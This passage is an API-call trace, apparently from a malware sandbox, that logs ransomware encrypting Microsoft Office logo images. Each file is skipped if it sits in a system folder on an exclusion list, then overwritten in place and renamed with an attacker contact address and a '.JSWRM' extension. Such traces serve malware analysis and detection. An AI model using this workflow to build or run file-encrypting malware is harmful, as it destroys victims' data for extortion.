dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.044] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1320, lpOverlapped=0x0) returned 1 [0133.044] CloseHandle (hObject=0x238) returned 1 [0133.044] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.045] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6192e9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6192e9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6192e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9e9, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.contrast-white_scale-80.png", cAlternateFileName="MSACCE~2.PNG")) returned 1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2="windows") returned -1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0133.045] lstrcmpiW (lpString1="MsAccessLogo.contrast-white_scale-80.png", lpString2="msocache") returned -1 [0133.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0133.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.contrast-white_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0133.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.047] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2537) returned 1 [0133.047] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.047] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9e0, lpOverlapped=0x0) returned 1 [0133.049] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.049] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9e0, lpOverlapped=0x0) returned 1 [0133.049] CloseHandle (hObject=0x238) returned 1 [0133.049] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.050] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a68b471, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc35, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.scale-100.png", cAlternateFileName="MS31C8~1.PNG")) returned 1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2=".") returned 1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2="..") returned 1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2="...") returned 1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2="windows") returned -1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2="recovery") returned -1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2="perflogs") returned -1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2="documents and settings") returned 1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2="system volume information") returned -1 [0133.050] lstrcmpiW (lpString1="MsAccessLogo.scale-100.png", lpString2="msocache") returned -1 [0133.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 26 [0133.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-100.png", cchWideChar=26, lpMultiByteStr=0x241330, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 26 [0133.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.051] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3125) returned 1 [0133.051] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.051] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc30, lpOverlapped=0x0) returned 1 [0133.062] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.062] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc30, lpOverlapped=0x0) returned 1 [0133.063] CloseHandle (hObject=0x238) returned 1 [0133.063] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.064] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a68b471, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xee8, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.scale-140.png", cAlternateFileName="MS30DC~1.PNG")) returned 1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2=".") returned 1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2="..") returned 1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2="...") returned 1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2="windows") returned -1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2="recovery") returned -1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2="perflogs") returned -1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2="documents and settings") returned 1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2="system volume information") returned -1 [0133.064] lstrcmpiW (lpString1="MsAccessLogo.scale-140.png", lpString2="msocache") returned -1 [0133.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x241290, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 26 [0133.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-140.png", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 26 [0133.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.065] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.065] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3816) returned 1 [0133.065] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.065] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xee0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xee0, lpOverlapped=0x0) returned 1 [0133.067] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.067] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xee0, lpOverlapped=0x0) returned 1 [0133.067] CloseHandle (hObject=0x238) returned 1 [0133.067] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.068] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a68b471, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.scale-180.png", cAlternateFileName="MS72AB~1.PNG")) returned 1 [0133.068] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2=".") returned 1 [0133.068] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2="..") returned 1 [0133.068] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2="...") returned 1 [0133.068] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2="windows") returned -1 [0133.068] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2="recovery") returned -1 [0133.069] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2="perflogs") returned -1 [0133.069] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2="documents and settings") returned 1 [0133.069] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.069] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2="system volume information") returned -1 [0133.069] lstrcmpiW (lpString1="MsAccessLogo.scale-180.png", lpString2="msocache") returned -1 [0133.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x2412b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 26 [0133.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0133.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-180.png", cchWideChar=26, lpMultiByteStr=0x241128, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 26 [0133.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.069] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.070] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5115) returned 1 [0133.070] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.070] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x13f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x13f0, lpOverlapped=0x0) returned 1 [0133.072] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.072] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x13f0, lpOverlapped=0x0) returned 1 [0133.072] CloseHandle (hObject=0x238) returned 1 [0133.072] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.073] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a68b471, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa6b, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogo.scale-80.png", cAlternateFileName="MS2629~1.PNG")) returned 1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2=".") returned 1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2="..") returned 1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2="...") returned 1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2="windows") returned -1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2="recovery") returned -1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2="perflogs") returned -1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2="documents and settings") returned 1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2="system volume information") returned -1 [0133.073] lstrcmpiW (lpString1="MsAccessLogo.scale-80.png", lpString2="msocache") returned -1 [0133.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 25 [0133.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0133.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogo.scale-80.png", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 25 [0133.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.074] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2667) returned 1 [0133.074] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.074] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa60, lpOverlapped=0x0) returned 1 [0133.076] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.076] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa60, lpOverlapped=0x0) returned 1 [0133.076] CloseHandle (hObject=0x238) returned 1 [0133.076] MoveFileW (lpExistingFileName="C:\\Program 